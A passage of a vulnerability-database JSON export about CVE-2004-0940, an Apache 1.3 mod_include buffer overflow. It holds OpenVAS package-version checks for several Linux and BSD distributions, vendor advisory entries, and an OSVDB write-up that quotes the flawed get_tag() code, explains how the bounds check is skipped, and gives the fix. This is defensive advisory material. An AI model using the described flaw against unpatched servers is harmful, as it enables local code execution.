E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-www/apache\", unaffected: make_list(\"ge 1.3.32-r1\"), vulnerable: make_list(\"lt 1.3.32-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-15T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52314", "href": "http://plugins.openvas.org/nasl.php?oid=52314", "type": "openvas", "title": "FreeBSD Ports: apache", "sourceData": "#\n#VID 6e6a6b8a-2fde-11d9-b3a2-0050fc56d258\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n apache\n apache+mod_ssl\n apache+mod_ssl+ipv6\n apache+mod_perl\n apache+ipv6\n apache+ssl\n ru-apache\n ru-apache+mod_ssl\n\nCVE-2004-0940\nBuffer overflow in the get_tag function in mod_include for Apache\n1.3.x to 1.3.32 allows local users who can create SSI documents to\nexecute arbitrary code as the apache user via SSI (XSSI) documents\nthat trigger a length calculation error.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.securitylab.ru/48807.html\nhttp://www.vuxml.org/freebsd/6e6a6b8a-2fde-11d9-b3a2-0050fc56d258.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52314);\n script_version(\"$Revision: 4075 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-15 15:13:05 +0200 (Thu, 15 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_bugtraq_id(11471);\n script_cve_id(\"CVE-2004-0940\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: apache\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.33\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.32+2.8.21_1\")<0) {\n txt += 'Package apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.32+2.8.21_1\")<0) {\n txt += 'Package apache+mod_ssl+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_perl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.31\")<=0) {\n txt += 'Package apache+mod_perl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.33\")<0) {\n txt += 'Package apache+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.29.1.55\")<=0) {\n txt += 'Package apache+ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.33+30.21\")<0) {\n txt += 'Package ru-apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.33+30.21+2.8.22\")<0) {\n txt += 'Package ru-apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940", "CVE-2004-0492"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-305-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231053902", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231053902", "type": "openvas", "title": "Slackware Advisory SSA:2004-305-01 apache+mod_ssl ", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_305_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.53902\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2004-0940\", \"CVE-2004-0492\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2004-305-01 apache+mod_ssl \");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(8\\.1|9\\.0|9\\.1|10\\.0)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-305-01\");\n\n script_tag(name:\"insight\", value:\"New apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix a security issue. Apache has been upgraded to\nversion 1.3.33 which fixes a buffer overflow which may allow local\nusers to execute arbitrary code as the apache user.\n\nThe mod_ssl package has also been upgraded to version 2.8.22_1.3.33.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2004-305-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.33-i386-1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.22_1.3.33-i386-1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.33-i386-1\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.22_1.3.33-i386-1\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.33-i486-1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.22_1.3.33-i486-1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.33-i486-1\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.22_1.3.33-i486-1\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940", "CVE-2004-0492"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-305-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:53902", "href": "http://plugins.openvas.org/nasl.php?oid=53902", "type": "openvas", "title": "Slackware Advisory SSA:2004-305-01 apache+mod_ssl", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_305_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix a security issue. Apache has been upgraded to\nversion 1.3.33 which fixes a buffer overflow which may allow local\nusers to execute arbitrary code as the apache user.\n\nThe mod_ssl package has also been upgraded to version 2.8.22_1.3.33.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2004-305-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-305-01\";\n \nif(description)\n{\n script_id(53902);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2004-0940\", \"CVE-2004-0492\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2004-305-01 apache+mod_ssl \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.33-i386-1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.22_1.3.33-i386-1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.33-i386-1\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.22_1.3.33-i386-1\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.33-i486-1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.22_1.3.33-i486-1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.33-i486-1\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.22_1.3.33-i486-1\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0885", "CVE-2004-0940"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache\n mod_ssl\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5014050 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65132", "href": "http://plugins.openvas.org/nasl.php?oid=65132", "type": "openvas", "title": "SLES9: Security update for apache", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5014050.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for apache\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache\n mod_ssl\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5014050 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65132);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-0940\", \"CVE-2004-0885\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for apache\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~1.3.29~71.15\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0885", "CVE-2004-0940"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache\n mod_ssl\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5014050 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065132", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065132", "type": "openvas", "title": "SLES9: Security update for apache", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5014050.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for apache\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache\n mod_ssl\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5014050 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65132\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-0940\", \"CVE-2004-0885\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for apache\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~1.3.29~71.15\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "httpd": [{"lastseen": "2016-09-26T21:39:38", "bulletinFamily": "software", "cvelist": ["CVE-2004-0940"], "description": "\n\nA buffer overflow in mod_include could allow a local user who\nis authorised to create server side include (SSI) files to gain\nthe privileges of a httpd child.\n\n", "edition": 1, "modified": "2004-10-28T00:00:00", "published": "2004-10-21T00:00:00", "id": "HTTPD:D1741B6A255EEEFE57FCBB18F638BF8D", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 1.3.33: mod_include overflow", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-12-24T14:26:52", "bulletinFamily": "software", "cvelist": ["CVE-2004-0940"], "description": "\n\nA buffer overflow in mod_include could allow a local user who\nis authorised to create server side include (SSI) files to gain\nthe privileges of a httpd child.\n\n", "edition": 5, "modified": "2004-10-21T00:00:00", "published": "2004-10-21T00:00:00", "id": "HTTPD:88FE130D4F7C240484D2151167EA668E", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: mod_include overflow", "type": "httpd", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "cvelist": ["CVE-2004-0940"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in the Apache HTTP server mod_include module (compiled in by default). The get_tag() function in mod_include.c contains a logic flaw resulting in a buffer overflow. A local attacker who is authorized to create server side include (SSI) files, can create a specially crafted HTML file and cause arbitrary code execution with the privileges of the httpd child process, resulting in a loss of integrity.\n## Technical Description\nThe overflow exists in the get_tag() function in mod_include.c:\nstatic char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode)\n{\n...\n term = c;\n while (1) {\n GET_CHAR(in, c, NULL, p);\n[1] if (t - tag == tagbuf_len) {\n *t = '\\0';\n return NULL;\n }\n/* Want to accept \\\" as a valid character within a string. */\n if (c == '\\\\') {\n[2] *(t++) = c; /* Add backslash */\n GET_CHAR(in, c, NULL, p);\n if (c == term) { /* Only if */\n[3] *(--t) = c; /* Replace backslash ONLY for terminator */\n }\n }\n else if (c == term) {\n break;\n }\n[4] *(t++) = c;\n }\n *t = '\\0';\n...\n}\n\nThe first check (labeled [1]) is used to find the end of the tag buffer. However, the check could be skipped if conditions [2] and [4] are met at the same time condition [3] is not. Thus, an attacker is able to craft a malformed HTML file that overwrites a static buffer causing arbitrary code execution to occur with privileges of the HTTP server child process.\n## Solution Description\nUpgrade to Apache version 1.3.33 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): \n\nIn the get_tag() function (mod_include.c), the following line should be changed from:\nif (t - tag == tagbuf_len) {\nto\nif (t - tag >= tagbuf_len-1) {\n## Short Description\nA local overflow exists in the Apache HTTP server mod_include module (compiled in by default). The get_tag() function in mod_include.c contains a logic flaw resulting in a buffer overflow. A local attacker who is authorized to create server side include (SSI) files, can create a specially crafted HTML file and cause arbitrary code execution with the privileges of the httpd child process, resulting in a loss of integrity.\n## References:\nVendor URL: http://httpd.apache.org/\nVendor URL: http://minimal.cx/mod_include.php\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200411-03.xml)\n[Vendor Specific Advisory URL](http://www.debian.org/security/2004/dsa-594)\n[Vendor Specific Advisory URL](http://itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01113)\n[Vendor Specific Advisory URL](http://www.apache.org/dist/httpd/Announcement.html)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2005-011_RHSA-2004-586.pdf)\n[Vendor Specific Advisory URL](http://www-1.ibm.com/support/docview.wss?uid=swg24009600)\n[Vendor Specific Advisory URL](http://www.vmware.com/support/kb/enduser/std_adp.php?p_sid=FsNALBWh&p_lva=&p_faqid=1561)\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/search/document.do?assetkey=1-26-102197-1)\nSecurity Tracker: 1011783\n[Secunia Advisory ID:12898](https://secuniaresearch.flexerasoftware.com/advisories/12898/)\n[Secunia Advisory ID:13880](https://secuniaresearch.flexerasoftware.com/advisories/13880/)\n[Secunia Advisory ID:17311](https://secuniaresearch.flexerasoftware.com/advisories/17311/)\n[Secunia Advisory ID:13042](https://secuniaresearch.flexerasoftware.com/advisories/13042/)\n[Secunia Advisory ID:13068](https://secuniaresearch.flexerasoftware.com/advisories/13068/)\n[Secunia Advisory ID:15365](https://secuniaresearch.flexerasoftware.com/advisories/15365/)\n[Secunia Advisory ID:13115](https://secuniaresearch.flexerasoftware.com/advisories/13115/)\n[Secunia Advisory ID:13229](https://secuniaresearch.flexerasoftware.com/advisories/13229/)\n[Secunia Advisory ID:16943](https://secuniaresearch.flexerasoftware.com/advisories/16943/)\n[Secunia Advisory ID:19073](https://secuniaresearch.flexerasoftware.com/advisories/19073/)\n[Secunia Advisory ID:13303](https://secuniaresearch.flexerasoftware.com/advisories/13303/)\nRedHat RHSA: RHSA-2005:816\nOther Advisory URL: http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.533785\nOther Advisory URL: http://www.suse.de/de/security/2004_01_sr.html\nOther Advisory URL: http://www-1.ibm.com/support/docview.wss?rs=0&uid=isg1SSRVHMCHMC_S081514_252&loc=en_US&cs=utf-8&cc=us&lang=all\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:134\nOther Advisory URL: http://www.trustix.net/errata/2004/0056/\n[Nessus Plugin ID:15554](https://vulners.com/search?query=pluginID:15554)\n[Nessus Plugin ID:15606](https://vulners.com/search?query=pluginID:15606)\nISS X-Force ID: 17785\nGeneric Exploit URL: http://www.securiteam.com/unixfocus/6A00P15BFG.html\n[CVE-2004-0940](https://vulners.com/cve/CVE-2004-0940)\n", "modified": "2004-10-21T04:20:22", "published": "2004-10-21T04:20:22", "id": "OSVDB:11003", "href": "https://vulners.com/osvdb/OSVDB:11003", "title": "Apache HTTP Server mod_include get_tag() Function Local Overflow", "type": "osvdb", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2016-09-26T17:26:38", "edition": 1, "description": "The following package needs to be updated: apache+ipv6", "published": "2004-11-23T00:00:00", "type": "nessus", "title": "FreeBSD : apache mod_include buffer overflow vulnerability (11)", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "modified": "2011-10-03T00:00:00", "id": 